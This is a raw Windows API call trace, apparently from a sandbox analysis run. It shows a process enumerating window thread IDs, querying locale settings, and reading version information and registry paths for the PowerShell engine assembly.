	[0506.270] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.270] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.270] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.270] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.270] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.271] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.271] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.271] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x818
	[0506.271] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x5b8
	[0506.271] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x494
	[0506.271] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1ec
	[0506.271] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x440
	[0506.271] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x7e8
	[0506.271] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x730
	[0506.272] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x2c8
	[0506.272] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x31c
	[0506.272] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x330
	[0506.272] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x128
	[0506.272] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x5c8
	[0506.272] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x6f8
	[0506.272] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x358
	[0506.272] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x73c
	[0506.273] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xb0
	[0506.273] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x250
	[0506.273] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x240
	[0506.273] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x790
	[0506.273] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x61c
	[0506.273] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x540
	[0506.273] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x538
	[0506.273] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x568
	[0506.273] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x538
	[0506.274] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x568
	[0506.274] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x538
	[0506.274] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x540
	[0506.274] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x540
	[0506.274] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x57c
	[0506.274] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x460
	[0506.274] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x554
	[0506.274] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.274] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x528
	[0506.275] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.275] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.275] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.275] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x79c
	[0506.275] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.275] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4e0
	[0506.275] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.275] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x460
	[0506.276] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x460
	[0506.276] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x44c
	[0506.276] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x778
	[0506.276] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x460
	[0506.276] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x558
	[0506.276] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.276] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.276] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x10c4
	[0506.277] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x128c
	[0506.277] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x16e8
	[0506.277] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x16cc
	[0506.277] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x274
	[0506.277] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x10e0
	[0506.277] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x10cc
	[0506.277] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x10c0
	[0506.277] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x10d0
	[0506.277] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1198
	[0506.278] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1080
	[0506.278] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1074
	[0506.278] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x106c
	[0506.278] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1474
	[0506.278] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1414
	[0506.278] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xbd0
	[0506.278] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x550
	[0506.278] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xa38
	[0506.279] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x16d0
	[0506.279] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x16d4
	[0506.279] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x15bc
	[0506.279] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x15a0
	[0506.279] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x159c
	[0506.279] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1598
	[0506.279] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1594
	[0506.279] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1590
	[0506.279] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x158c
	[0506.280] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1588
	[0506.280] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1584
	[0506.280] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1580
	[0506.280] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x157c
	[0506.280] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1488
	[0506.280] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1404
	[0506.280] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x11b8
	[0506.280] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xbd4
	[0506.280] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xe0c
	[0506.281] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xd30
	[0506.281] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xe70
	[0506.281] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x13b8
	[0506.281] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xe20
	[0506.281] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xe2c
	[0506.281] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xe00
	[0506.281] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xe04
	[0506.281] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xc94
	[0506.282] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x13b0
	[0506.282] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x13ac
	[0506.282] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x13a8
	[0506.282] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1374
	[0506.282] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x132c
	[0506.282] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1328
	[0506.287] WerSetFlags () returned 0x0
	[0506.971] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0506.971] CoTaskMemFree (pv=0x0) 
	[0506.972] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xadcc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xadcc0 | out: pulNumLanguages=0xadcc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xadcc0) returned 1
	[0506.972] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xadcc8, pwszLanguagesBuffer=0x2c665c0, pcchLanguagesBuffer=0xadcc0 | out: pulNumLanguages=0xadcc8, pwszLanguagesBuffer=0x2c665c0, pcchLanguagesBuffer=0xadcc0) returned 1
	[0506.977] CoTaskMemAlloc (cb=0x24) returned 0x207e10
	[0506.977] GetUserDefaultLocaleName (in: lpLocaleName=0x207e10, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0506.978] CoTaskMemFree (pv=0x207e10) 
	[0507.001] CoTaskMemAlloc (cb=0x104) returned 0x1c6b30
	[0507.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1c6b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.001] CoTaskMemFree (pv=0x1c6b30) 
	[0507.003] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0507.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.003] CoTaskMemFree (pv=0x20da70) 
	[0507.553] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0507.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.554] CoTaskMemFree (pv=0x20da70) 
	[0507.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0507.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0507.567] SetErrorMode (uMode=0x1) returned 0x1
	[0507.567] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xad940 | out: lpFileInformation=0xad940*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0507.567] SetErrorMode (uMode=0x1) returned 0x1
	[0507.567] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xadbb0 | out: lpdwHandle=0xadbb0) returned 0x94c
	[0507.568] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c69e50 | out: lpData=0x2c69e50) returned 1
	[0507.569] VerQueryValueW (in: pBlock=0x2c69e50, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xadb28, puLen=0xadb20 | out: lplpBuffer=0xadb28*=0x2c69eec, puLen=0xadb20) returned 1
	[0507.569] VerQueryValueW (in: pBlock=0x2c69e50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xada98, puLen=0xada90 | out: lplpBuffer=0xada98*=0x2c69fc8, puLen=0xada90) returned 1
	[0507.569] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0507.569] CoTaskMemAlloc (cb=0x2e) returned 0x20cd70
	[0507.569] lstrcpyW (in: lpString1=0x20cd70, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0507.569] CoTaskMemFree (pv=0x20cd70) 
	[0507.569] VerQueryValueW (in: pBlock=0x2c69e50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xada98, puLen=0xada90 | out: lplpBuffer=0xada98*=0x2c6a01c, puLen=0xada90) returned 1
	[0507.569] lstrlenW (lpString="System.Management.Automation") returned 28
	[0507.569] CoTaskMemAlloc (cb=0x3c) returned 0x20b570
	[0507.569] lstrcpyW (in: lpString1=0x20b570, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0507.569] CoTaskMemFree (pv=0x20b570) 
	[0507.569] VerQueryValueW (in: pBlock=0x2c69e50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xada98, puLen=0xada90 | out: lplpBuffer=0xada98*=0x2c6a078, puLen=0xada90) returned 1
	[0507.569] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0507.569] CoTaskMemAlloc (cb=0x20) returned 0x207ed0
	[0507.570] lstrcpyW (in: lpString1=0x207ed0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0507.570] CoTaskMemFree (pv=0x207ed0) 
	[0507.570] VerQueryValueW (in: pBlock=0x2c69e50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xada98, puLen=0xada90 | out: lplpBuffer=0xada98*=0x2c6a0b8, puLen=0xada90) returned 1
	[0507.570] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0507.570] CoTaskMemAlloc (cb=0x44) returned 0x20b570
	[0507.570] lstrcpyW (in: lpString1=0x20b570, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0507.570] CoTaskMemFree (pv=0x20b570) 
	[0507.570] VerQueryValueW (in: pBlock=0x2c69e50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xada98, puLen=0xada90 | out: lplpBuffer=0xada98*=0x2c6a120, puLen=0xada90) returned 1
	[0507.570] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0507.570] CoTaskMemAlloc (cb=0x76) returned 0x1a0660
	[0507.570] lstrcpyW (in: lpString1=0x1a0660, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0507.570] CoTaskMemFree (pv=0x1a0660) 
	[0507.570] VerQueryValueW (in: pBlock=0x2c69e50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xada98, puLen=0xada90 | out: lplpBuffer=0xada98*=0x2c6a1bc, puLen=0xada90) returned 1
	[0507.570] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0507.570] CoTaskMemAlloc (cb=0x44) returned 0x20b570
	[0507.570] lstrcpyW (in: lpString1=0x20b570, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0507.571] CoTaskMemFree (pv=0x20b570) 
	[0507.571] VerQueryValueW (in: pBlock=0x2c69e50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xada98, puLen=0xada90 | out: lplpBuffer=0xada98*=0x2c6a220, puLen=0xada90) returned 1
	[0507.571] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0507.571] CoTaskMemAlloc (cb=0x58) returned 0x187460
	[0507.571] lstrcpyW (in: lpString1=0x187460, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0507.571] CoTaskMemFree (pv=0x187460) 
	[0507.571] VerQueryValueW (in: pBlock=0x2c69e50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xada98, puLen=0xada90 | out: lplpBuffer=0xada98*=0x2c6a29c, puLen=0xada90) returned 1
	[0507.571] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0507.571] CoTaskMemAlloc (cb=0x20) returned 0x207ed0
	[0507.571] lstrcpyW (in: lpString1=0x207ed0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0507.571] CoTaskMemFree (pv=0x207ed0) 
	[0507.571] VerQueryValueW (in: pBlock=0x2c69e50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xada98, puLen=0xada90 | out: lplpBuffer=0xada98*=0x2c69f44, puLen=0xada90) returned 1
	[0507.571] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0507.571] CoTaskMemAlloc (cb=0x66) returned 0x207040
	[0507.571] lstrcpyW (in: lpString1=0x207040, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0507.571] CoTaskMemFree (pv=0x207040) 
	[0507.572] VerQueryValueW (in: pBlock=0x2c69e50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xada98, puLen=0xada90 | out: lplpBuffer=0xada98*=0x0, puLen=0xada90) returned 0
	[0507.572] VerQueryValueW (in: pBlock=0x2c69e50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xada98, puLen=0xada90 | out: lplpBuffer=0xada98*=0x0, puLen=0xada90) returned 0
	[0507.572] VerQueryValueW (in: pBlock=0x2c69e50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xada98, puLen=0xada90 | out: lplpBuffer=0xada98*=0x0, puLen=0xada90) returned 0
	[0507.572] VerQueryValueW (in: pBlock=0x2c69e50, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xada68, puLen=0xada60 | out: lplpBuffer=0xada68*=0x2c69eec, puLen=0xada60) returned 1
	[0507.572] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0507.572] VerLanguageNameW (in: wLang=0x0, szLang=0x1a4bb0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0507.572] CoTaskMemFree (pv=0x1a4bb0) 
	[0507.572] VerQueryValueW (in: pBlock=0x2c69e50, lpSubBlock="\\", lplpBuffer=0xadab8, puLen=0xadab0 | out: lplpBuffer=0xadab8*=0x2c69e78, puLen=0xadab0) returned 1
	[0507.580] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0507.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.580] CoTaskMemFree (pv=0x20da70) 
	[0507.581] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0507.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.582] CoTaskMemFree (pv=0x20da70) 
	[0507.587] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad988 | out: phkResult=0xad988*=0x2f4) returned 0x0
	[0507.588] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xad978 | out: phkResult=0xad978*=0x2f8) returned 0x0
	[0507.588] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xada08 | out: phkResult=0xada08*=0x2fc) returned 0x0
	[0507.591] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad94c, lpData=0x0, lpcbData=0xad948*=0x0 | out: lpType=0xad94c*=0x1, lpData=0x0, lpcbData=0xad948*=0x56) returned 0x0
	[0507.592] CoTaskMemAlloc (cb=0x5a) returned 0x206fd0
	[0507.592] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad91c, lpData=0x206fd0, lpcbData=0xad918*=0x56 | out: lpType=0xad91c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad918*=0x56) returned 0x0
	[0507.592] CoTaskMemFree (pv=0x206fd0) 
	[0508.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0508.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
